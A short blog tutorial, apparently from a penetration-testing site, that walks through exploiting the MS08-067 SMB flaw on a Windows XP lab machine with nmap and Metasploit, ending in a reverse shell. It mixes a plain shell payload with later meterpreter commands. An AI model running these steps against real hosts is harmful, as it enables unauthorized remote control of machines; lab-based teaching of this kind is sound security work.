Exploit Windows XP SMB Service MS08-067 (netapi) vulnerability with Metasploit | Getting strated with Metasploit

As most of us know or hear about the Metasploit framework from Rapid7. We will learn how to use the Metasploit Framework to exploit a well known Microsoft Windows XP SMB service vulnerability (MS-08-067) and gain full control of the Windows machine.

Lab Setup:

Target: Windows XP SP2 (IP Address)  -->
Attacker: Kali machine  (IP Address) -->

We have installed Windows XP SP2 and our attacking machine Kali Linux in Virtual Box machines. We have given them the bridge connectivity so that they can share a common WiFi network.

A quick Nmap scan of our network for Windows SMB service gives us our victim machine IP. We can see below our victim Windows XP has it's port 135 and 445 are opened, and that is used by Windows file sharing service SMB.

root@PenTestPundit:~# nmap -Pn -sS -sV -p 135,445

Now we will scan with NMap script to test the victim is vulnerable to the well-known vulnerability MS-08-067 (netapi).

root@PenTestPundit:~# nmap -Pn --script smb-vuln-ms08-067.nse

As we can see our victim is vulnerable, now we will fire up the Metasploit console and do the rest of the exploitation part. First, we have to start the postgresql service that is used by the Metasploit framework, followed by msfconsole command.

root@Pentest-Pundit:~# service postgresql start
root@Pentest-Pundit:~# msfconsole

After msfconsole gets open we can type in the Microsoft Windows exploit for MS-08-067 and set the payload to meterpreter, and then we have to set LHOST as our Kali IP address and RHOST as our victim windows IP address.

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netapi) >
msf exploit(windows/smb/ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(windows/smb/ms08_067_netapi) > set LHOST
msf exploit(windows/smb/ms08_067_netapi) > set RHOST
msf exploit(windows/smb/ms08_067_netapi) > exploit

After successful exploitation, we can type in sysinfo command to check system information. Now we can use our meterpreter shell access to do whatever this payload offers us.

No comments:

Post a Comment